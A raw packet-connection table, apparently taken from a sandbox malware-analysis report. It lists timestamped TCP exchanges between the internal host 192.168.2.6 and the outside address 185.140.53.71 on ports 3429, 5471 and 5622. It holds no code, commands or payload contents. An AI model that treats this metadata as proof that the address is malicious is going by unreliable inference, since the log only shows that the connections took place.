Apr 28, 2021 20:50:19.788439035 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.789309025 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.789354086 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.789423943 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.789567947 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.790242910 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.790317059 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.790354967 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.806029081 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:20.031419992 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:20.081882000 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:20.133076906 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:20.210800886 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:20.549834967 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:21.271866083 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:21.598794937 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:21.897939920 CEST	49712	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:22.170391083 CEST	5471	49712	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:22.380255938 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:22.675901890 CEST	49712	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:22.677313089 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:22.853481054 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:22.894597054 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:22.930093050 CEST	5471	49712	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:22.960689068 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:23.254430056 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:23.441471100 CEST	49712	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:23.709028006 CEST	5471	49712	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:24.563190937 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:24.563719034 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:24.972918987 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:25.167659998 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:25.409199953 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:25.898941040 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:25.941739082 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:26.000113010 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:26.225423098 CEST	49714	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:26.345004082 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:26.474102020 CEST	5471	49714	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:27.004270077 CEST	49714	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:27.262048960 CEST	5471	49714	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:27.538355112 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:27.769921064 CEST	49714	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:27.803426981 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:27.803616047 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:28.021905899 CEST	5471	49714	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:28.404922962 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:28.681312084 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:28.681340933 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:28.681471109 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:28.693548918 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:28.895451069 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:28.941946983 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:28.972014904 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:29.082564116 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:29.833873034 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:30.145987034 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:30.630373955 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:30.867027044 CEST	49717	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:30.918931961 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:31.155793905 CEST	5471	49717	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:31.785958052 CEST	49717	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:32.051057100 CEST	5471	49717	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:32.094626904 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:32.414174080 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:32.415476084 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:32.582858086 CEST	49717	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:32.733067989 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:32.834323883 CEST	5471	49717	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:35.351835966 CEST	49718	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:35.629456043 CEST	5471	49718	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:35.989702940 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:36.036223888 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:36.102041006 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:36.130029917 CEST	49718	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:36.375730991 CEST	5471	49718	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:36.411103964 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:36.879329920 CEST	49718	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:37.144983053 CEST	5471	49718	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:38.756326914 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:39.071711063 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:39.664434910 CEST	49719	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:39.968416929 CEST	5471	49719	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:40.057323933 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:40.099077940 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:40.143989086 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:40.437644958 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:40.474179983 CEST	49719	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:40.735516071 CEST	5471	49719	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:41.239861012 CEST	49719	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:41.519347906 CEST	5471	49719	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:42.643821955 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:42.644289970 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:42.973448038 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:44.024357080 CEST	49720	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:44.305269003 CEST	5471	49720	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:44.818181038 CEST	49720	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:45.065876007 CEST	5471	49720	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:45.568155050 CEST	49720	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:45.824393034 CEST	5471	49720	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:46.967358112 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:47.270360947 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:47.270555019 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:47.542988062 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:47.584007025 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:47.846647024 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:47.896512032 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:47.989829063 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.289378881 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.289659023 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.337726116 CEST	49721	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.411842108 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412048101 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412132978 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412148952 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.412256956 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412278891 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412295103 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412312031 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.412313938 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412353039 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.412453890 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412503958 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.412614107 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412892103 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.412942886 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.413319111 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.413486004 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.413548946 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.413613081 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.413688898 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.413741112 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.413840055 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.413887024 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.413935900 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.414383888 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.414937019 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.415008068 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.415868044 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.419759989 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.419825077 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.419872999 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.419970989 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.420037985 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.420101881 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.420264006 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.420327902 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.420500040 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.420613050 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.420679092 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.420866966 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.421094894 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.421168089 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.421359062 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.421963930 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.422076941 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.422246933 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.422872066 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.422949076 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.422966957 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.422979116 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.423008919 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.585860968 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.603387117 CEST	5471	49721	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.683404922 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.683593035 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.683726072 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.683825970 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.683944941 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.684007883 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.684640884 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.684967995 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.684989929 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.685044050 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.685067892 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.685107946 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.685151100 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.685170889 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.685234070 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.685272932 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.685399055 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.685457945 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.685578108 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.685903072 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.685966969 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.686281919 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.686717033 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.686790943 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.686952114 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.687314987 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.687386036 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.687622070 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.687911034 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.687980890 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.688307047 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.688518047 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.688586950 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.688918114 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.689280987 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.689399004 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.689996958 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.690224886 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.690295935 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.690865993 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.691159964 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.691240072 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.691905975 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.692118883 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.692198992 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.692564011 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.693058968 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.693136930 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.693418026 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.695401907 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.695434093 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.695453882 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.695472956 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.695527077 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.695933104 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.696000099 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.696432114 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.697108984 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.697186947 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.705012083 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.705471992 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.705574036 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.706234932 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.706923008 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.707000971 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.707586050 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.708026886 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.708095074 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.708473921 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.709064960 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.709148884 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.714421988 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.715250015 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.715367079 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.719705105 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.720820904 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.720916986 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.722903013 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.723043919 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.723140001 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.723562956 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.723733902 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.723804951 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.730360031 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.730837107 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.730966091 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.731759071 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.740798950 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.741007090 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.741178989 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.741339922 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.741419077 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.744074106 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.744119883 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.744244099 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.744304895 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.744724989 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.744820118 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.744973898 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.787358999 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.962924004 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.963850021 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.964498043 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.964540958 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.965267897 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.965331078 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.965353012 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.965559006 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.965617895 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.965836048 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.966080904 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.966130972 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.966232061 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.966567993 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.966629028 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.966713905 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.967006922 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.967067957 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.967120886 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.967386007 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.967434883 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.967467070 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.967549086 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.967588902 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.967768908 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.967832088 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.967852116 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.967878103 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.968125105 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.968170881 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.968235970 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.968307972 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.968346119 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.968354940 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.968427896 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.968468904 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.968594074 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.973696947 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.973774910 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.973799944 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.974322081 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.974430084 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.975545883 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.975572109 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.975644112 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.975680113 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.976027966 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.976083994 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.976397038 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.976845980 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.976901054 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.977513075 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.977861881 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.977917910 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.978290081 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.978775978 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.978837013 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.980369091 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.980391026 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.980432987 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.980611086 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.985511065 CEST	3429	49706	185.140.53.71	192.168.2.6
